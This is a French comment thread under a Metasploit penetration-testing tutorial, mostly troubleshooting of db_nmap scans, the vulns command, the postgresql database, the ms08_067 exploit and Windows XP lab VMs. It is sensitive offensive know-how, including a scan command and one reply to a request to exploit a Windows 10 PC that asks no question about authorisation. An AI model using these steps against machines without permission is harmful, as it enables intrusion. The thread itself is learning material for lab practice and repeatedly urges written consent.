Matthieu Mick tu n'est pas forcément obliger d'être sur le même réseau de la machine cible. seulement tu n'auras sûrement pas le même résultat lors du scanner si un pare feu bloque le trafic entrant et sortant
Merci pour ce tuto ! j'ai un probleme lorsque je tape hosts pour voir si le scan a bien été enregistrer dans ma base de donnée on m'afffiche " Database not connected"
tu dois démarrer d'abord le service et lier metasploit à cette base de donnée
salut,pouvez vous me recommander un bon livre pour apprendre le pen-test sur les app web en français ? et merci d'avance
Très bon tuto mais j'suis bloqué dès le debut, quand tu tape :
db_nmap -v -sS -A (ip.locale)
j'ai ce message qui s'affiche
[*] Nmap: 'You requested a scan type which requires root privileges.'
[*] Nmap: 'QUITTING!'
c'est due a quoi?
Carotte Rapée es tu sur une session user ou root ?
Informatrix : sécurité informatique une session Root, je me suis abonné et j'ai regardé toutes tes vidéos. Ils sont très bien expliqué. Et tu sais de quoi tu parles. Ca fait plaisir de tombé sur une personne passionné !
Bonsoir et merci pour tout ce que tu fais Informatix.
j'aimerai savoir comment faire si la machine cible n'a pas de vulnérabilité ?? parce que j'ai fait le scan et les ports 135, 445,139 sont ouverts mais la commande "vulns" ne me montre pas de vulnérabilité. Comment faire donc
+hub le tente alors un scanner de vulnérabilité comme nessus ou openvas .Il y a forcément une vulnérabilités sur un XP sp1/2/3
la commande s'il te plait pour les deux scanner parce que j'ai lancé le scanner syn, ssh, ftp_version et rien donc la commande de nessus et openvas
alors que la machine cible fonctionne sur OS XP SP2
+hub le la commande vulns ne marche pas à tout les coup . Cela dépendra de l'os et de sa version et aussi du scanner nse de nmap qui lui utilise certains scripts de vulnérabilités.
+hub le c'est normal que tu ne trouve pas nessus et openvas si tu ne les a pas installer . Ce sont des scanner de vulnérabilité à part de metasploit
Salut, merci pour la vidéo c'est super bien expliqué, mais je pense avoir un ptit soucis.
Quand j'envois la commande "vulns", celle ci ne me renvois rien. Sais tu pourquoi ?
salut merci encore . as-tu essayer db_vulns ?
+Informatrix : sécurité informatique oui j'ai essayé ça aussi, j'ai fais vulns apres avoir fais un scan d'un ordinateur sur mon reseau, sachant que j'ai kali linux qui tourne sous machine virtuelle
peut tu me donner la liste des commandes que tu as rentrée précédemment ?
+Informatrix : sécurité informatique les commandes que j'ai tapé etaient les meme que tu montre dans la video, c'est a dire : db_nmap -v -sS -A 192.168.0.30 /* qui est un ordinateur sur mon reseau local */
hosts
vurnls
Voila les commandes que j'ai effectué.
Eh au fait j'en profite pour poser ma question, sur quoi est ce que la commande vurnls se base pour dire quelle machine scannée possede ou non des vulnerabilité ?
Merci pour prendre le temps de repondre en tout cas
si tu as plusieurs machines scanner il se basera sur plusieurs Vecteurs comme l'OS ou les services ainsi que leur version . après cela ne veut pas dire que la commande vulns fonctionnera à tout les coups, sa serai trop simple sinon cela nous enlèverai le privilège de rechercher nous même les vulnérabilitées ;)
salut, me revoilà pour une nouvel question !! ^^ j'ai le même problème que Jey Husson la commande "vulns" ne m'affiche rien.....comme tu lui a conseiller, j'ai tester " db_vulns " le retour est que la commande est obsolète, j'ai donc fait un " help " pour voir les commande au cas ou....est la commande " vulns " existe bien, je suis donc censer avoir un retour quand je fait la commande mes la rien .... Aurais tu une idée ? a s'avoir que j'ai fait les même commande que toi ( bien sur avec mon IP cible) ... ma cible est Windows XP familiale Version 2002 sp2 qui tourne comme kali sous VMware et les 2 en connexion Briged.
Est super vidéo , j'ai adoré l'exercice sur root_me
Cordialement
Je vient aussi de me rendre compte quand tapant la commande " hosts " dans os_name ses windows 2000 qui apparais !!!! .....j'ai 2 iso windows XP et les deux sont identique en résulta......pourtant panneau de configuration / performance maintenance / System ses bien windows xp ........
Cordialement
pathinferno salut . alors non la commande vulns est facultative. tu pourras l'utiliser sur une VM sous Metasploitable 2 tu aura un résultat . mais sous une machine sous XP elle ne fonctionnera pas à tout les coup . elle aurait très bien put ne pas fonctionner chez moi. dans ce cas rien ne vaut un bon scanner de vulnérabilité comme nessus , openvas etc..... concernant la commande hosts et le windows 2000 tu n'est pas non plus le seul dans ce cas. mais ce n'est pas méchant étant donner que cette vulnérabilitées est présente aussi sur cette version de système.
ok merci bien pour t'on aide, je comprend mieux, oui j'ai sauter l’étape vulns vue que dans t'a vidéo tu explique que l'exploit ms08_067 est un exploit pour Windows xp je les tester direct !!! est sa passe :-p par contre je me poser la question : est ce que chaque Windows on des exploit comme celui la ? je suppose que non sinon trop simple......je reste impressionné par tout ce qui est possible de faire sans que la cible ne sens rende compte.......j'ai peur de mon pc maintenant !!!!!! merci et continue t'est vidéo elle sont super bien expliquer +1
Yo quand j'entre la commande "vulns" rien ne s'effectue.. de l'aide ? =) j'ai fais plein de scan sur différentes ip (avec db_nmap bien sur) mais a chaque fois vulns ne fais rien.
Après quelques redémarrage ça a finit par marcher ?wtf
+daniel ou victor la commande vulns ne fonctionne pas à tout les coups. Elle a fonctionné lors de ce tutoriel mais elle aurait très bien pu ne pas fonctionner aussi. Dans tout les cas il vaut mieux toujours passer par un scanner de vulnérabilité qui te donnera plus de résultats
ok maintenant la commande marche sans problème je ne sais pas pourquoi. Mais es-ce qu'il un moyen de trouver l'exploit (ici MS08-067) autre que "vulns" ? On dirait que pour toi cette commande est optionnelle alors que pour moi c'est le seul moyen de trouver l'exploit.
daniel ou victor comme je t'avais dit précédemment . tu peux sois passer par un scanner de vulnérabilités ou effectuer tes propres recherches via une base d'exploit publique afin de savoir si une vulnérabilités est disponible,de comprendre son fonctionnement et à partir de quel langage a t-elle été ( voir 4eme vidéo ). cest comme cela que tu pourras te passer de la commande vulns qui est très "capricieuse".
Ok merci pour le "support" même 1 an après =)
faudrait faire une video metasploit a travers internet ^^ merci encore pour tes video
c'est inclus dans le tutoriel ne t'en fait pas . déjà root-me.org c'est bien pour ceux qui veulent prendre la main. pour ce qui est des payloads à travers le net on y viendra aussi ce n'est pas compliqué du tout. merci
Salut je suis débutant mais j'ai remarqué un problème quand je fais des scans, le truc c'est que les scan ne s'enregistre pas quand je vais voir dans Hosts. Je voulais savoir comment résoudre ça. Merci de ta réponse
vince68 [FR] quand vous êtes dans Metasploit, vous taper bien la commande db_nmap pour exécuter vos scan ?
Oui je tapé bien les commandes de scan mais je crois que c'etait a cause des scans et des ip que j'utilisé
+vince68 [FR] les IP était sur la même plage d'adresse ?
Coool!
Bonjour, mais comment on peut connaître l'ip local de la victime? Faut-Il sont adresse ip pour retrouver son ip local?😐
+iDreaZyy Road to 0.1k non l'IP locale à distance vous ne laurez pas comme sa . Dans le cas d'un scanner à distance il vous faut l'adresse IP Public.
Informatrix : sécurité informatique D'accord, merciii beaucoup!😊
l'exemple montrer sur la vidéo est en local , mais cela marche t-il de meme pour une machine non connu ?
+ultime accrocraft tu veut dire depuis une machine depuis le net ?
+Informatrix , création , solution informat
par exemple un pc de une personne distante, un ami a moi souhaiterait tester son ordinateur aux failles et il voudrait donc que je fasse un test d'intrusion, pour cela je dois seulement lui demander son adresse ip ? ou autre chose ?
+ultime accrocraft tout depend de ce que tu veut faire , si tu veut que ton pentest soit baser sur du whitebox du blackbox ou greybox,.
-Si tu veut que ton pentest soit baser que sur du BlackBox donc a l'aveugle , tu devras te debrouiller tout seul du debut a la fin , c'est a dire lors de ta phase de collecte d'informations active et passive , pendant la recherche de faille et sur l'exploitation de la machine distante pour ensuite etablir des solutions afin de renforcer la securite
-Si tu veut que ton pentest sois baser sur du WhiteBox , ton amis te donnera la totalitee des informations que tu auras besoin pour proceder a l'exploitation pour ensuite etablir des solutions afin de renforcer la securite
-Et enfin le GreyBox je ne te fait pas de dessin , voir la premiere et la deuxieme solution , ton amis te donnera des informations limitee; et tu devras te debrouiller pour la suite pour finir par etablir des solutions afin de renforcer la securite
Si tu n'as pas regarder la premiere partie de ce chapitre concernant les bases et la recherches de vulnerabilitees je te conseil d'aller la voir avant de passer a la suite.
Ps : N'oublie pas d'avoir l'accord écrit et signer de la personnes chez qui tu vas etablir le pentest
+Informatrix , création , solution informatique
tout d'abord merci de m'avoir bien expliquer :) et répondu a ma question
je tiens compte de tous cela, et je comprend que il faut une preuve écrite en cas de problème ensuite.
Même si mon ami peut me donner toutes les infos nécessaire je préfère essayer de moi même et voir si je peux y arriver ( a fin de tester mes capacité et m'améliorer) cependant si je n'y arrive pas je lui demander de mes donnée toutes les infos :)
J'ai une dernière question :
pour réaliser un pentest de une machine , avec seulement l'adresse ip de celle-ci est t'il possible de le réaliser ? peut-on lancé un scan (nmap ect...) avec l'adresse ip de la victime ?
ps: désolée de toutes ces questions :)
+Informatrix , création , solution informatique
? :)
Bonjour, je voudrais savoir si tu as fais des études dans l'informatique ( sécurité ) si oui lequel, ou si tu as appris tout seul
bonjour. je n'ai fait aucune étude dans l'informatique. j'ai tout appris de moi même en prenant le temps de faire des recherches sur le net .lire des livres et de la documentations. pourquoi ? tu recherches à faire des études dans la sécurité ?
Oui, en effet je suis en seconde et la sécurité informatique, m’intéresse malgré cela je ne suis pas très fort en math, donc je me suis réoriente vers un bac ES je sais que ce n'est pas le meilleur bac mais je sais que en S je ne pourrais pas suivre. Donc c'est pour ça que je voulais vous demander quel étude vous avez fais (mais si vous avez des information à se sujet je suis preneur)
+AToMiiK Neo honnêtement je n'ai pas envie de te raconter de conneries mais est ce que tu a essayer de te renseigner à l'epitech ?
Si c'est comme l'Onisep oui, je me suis déjà renseigné la seul chose que je n'arrive pas à trouvé c'est si il est possible d'aller dans une école de sécurité informatique avec un bac ES, d'où ma demande
Je voudrais te demander une dernière chose, as-tu des livres ou de la documentation à me conseiller qui sont intéressent sur metasloit, test d’intrusion ou autre chose que l'on peut trouver dans le commerce
Salut! j'aimerais utiliser Metasploit pour exploit un pc windows 10... ca ne marche pas... comment je peux faire ca ... merci InfoMatrix
Deja, il y a un premier probleme, le pare feu est sans doute activer, mais surtout, les antis virus + mises a jours auto rendent ce genre d'attaques plus compliqués. Essaye deja de desactiver le pare feu, et vois si tu peux avancer. Sinon, installes une machine virtuelle windows XP et utilise un reseau NAT
marche pas le db_nmap sous kali linux 2.0
sa me marque
[-] Database not connected
TheBOOMGAMEUR service postgresql start et clique sur l'icône Metasploit lors de la première utilisation pour créer les dB
Informatrix : sécurité informatique ok merci
bonjour peut on trouver votre cour en pdf
Déjà merci pour tes vidéos super intéressantes
Et j'ai un petit problème super important
J'ai cherché partout la solution en vain
En téléchargeant win Xp sous vmware , Il m'affiche au moment du chargement
"OPERATING SYSTEM NOT FOUND"
J'ai essayé plusieurs ISO mais rien ne marche.
Et oui j'ai bien coché la case " USE ISO IMAGE FILES" dans les settings
Et sur internet il propose d'installer des logiciel chelou qui soit disant "résolve" le problème
Aide moi s'il te plait car sans la machine XP je ne peux pas commencer ce tuto
bye
Miradox Gaming bonjour . Essaye avec cette ISO mega.nz/#!TM1giDRK!iIHrZrV7Y5cdpIlVx1I-fN9XEaC-rKEF-bunHF3O1Xs
Merci pour ta réponse mais toujours la même erreur
Ça me met aussi "No boot file name received"
ca marque no session created
Moi cela ne marche pas quand je met vulns pour les vulnerabilitées cela ne marche pas ca me remet "msf" mais rien du tout d autre :'(
exemple de ce qui est arrivée:
msf>vulns
msf>
ikkeeeurss parce que la commande vulns ne fonctionne pas avec tout les systèmes d'exploitation. si tu veux de bons résultats lors d'une analyse de vulnérabilité privilégie des scanner de vulnérabilité comme openvas ou nessus avant de passer à l'exploitation
ok merci :p
Pour moi sa ne marchent pas quand je mes db_nmap -v -sS -A mon_ip_locale
il me donne juste avec
host
Ipxe
+Valentin a tu mis à jour ta distribution ? Et est ce que ta sources.list est correct ? Et est ce que tu démarre bien le service postgresql et cliquez sur l'icône de metasploit lors de la première utilisation afin qu'il puisse créer les dB ?
Ma distribution et bien a jour pour la sources.list je ne c'est pas le service postgresql aussi je ne c'est pas car je suis sous 2.0 et oui j'ai bien cliqué la première fois sur l'icone de metasploit
+Valentin comment tu peut savoir si ta distribution est bien à jour si tu n'a pas modifier la sources.list afin d'ajouter les dépôts de kali . D'ailleurs tu fait bien de me le dire sa va me permettre de faire un tutoriel de soutien pour les base d'utilisation de linux car tu n'es pas tout seul dans ce cas.
Concernant le service postgresql commence par la première vidéo.
Informatrix : sécurité informatique J'ai la version v4.13.20-dev de metasploit (ps quand je fait db_status il me mes postgresql connected to msf ) ps quand je fait service metasploit start
il me met l'erreur Failed to start metasploit.service: Unit metasploit.service not found. HELP !
Informatrix : sécurité informatique Ha oui mince j'avais pas tester bon bah j'ai mis les dépôts http.kali.org/kali sana main non-free contrib ^^'